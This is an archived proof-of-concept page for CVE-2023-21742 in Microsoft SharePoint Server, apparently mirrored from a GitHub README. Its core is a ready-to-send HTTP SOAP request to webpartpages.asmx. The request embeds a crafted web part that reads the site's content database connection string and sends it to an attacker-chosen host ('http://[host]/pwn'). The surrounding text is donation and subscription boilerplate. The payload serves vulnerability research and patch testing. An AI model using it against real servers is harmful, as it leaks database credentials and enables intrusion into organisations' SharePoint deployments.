Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-21742 PoC — Microsoft SharePoint Server Remote Code Execution Vulnerability

Source
https://github.com/ohnonoyesyes/CVE-2023-21742
Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2023-21742)
Description:Microsoft SharePoint Server Remote Code Execution Vulnerability
Description
CVE-2023-21742 Poc
Readme
# CVE-2023-21742

## PoC

Attention: It's only a PoC to leak the attribute/property, not RCE EXP.

```
POST /_vti_bin/webpartpages.asmx HTTP/1.1
Host: splab13
SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormat
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
Content-Length: 1733

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[
<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
      <%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<WebPartPages:WebPartZone id="id00" runat="server">
<ZoneTemplate>

<WebPartPages:XsltListFormWebPart id="id01" runat="server"> 
<XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink>
  <DataSources> 
 <att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn">
      <SelectCommand>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
          <leakeddata>{leak}</leakeddata>
          </soap:Body>
        </soap:Envelope>
      </SelectCommand>
      <SelectParameters>
        <WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/>
      </SelectParameters>
    </att:SoapDataSource> 
  </DataSources> 
  
</WebPartPages:XsltListFormWebPart>
<att:TemplateContainer runat="server" id="f01" />
</ZoneTemplate>
</WebPartPages:WebPartZone> 

]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>
```

## Reference

- https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-sharepoint-webpart-property-traversal-cve-2022-38053-cve-2023-21742-bc6931698a5f
- https://nvd.nist.gov/vuln/detail/CVE-2023-21742
File Snapshot

 [4.0K]  /data/pocs/588c8b50be9c00dc221f6e926636a591e6069f98
└── [2.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →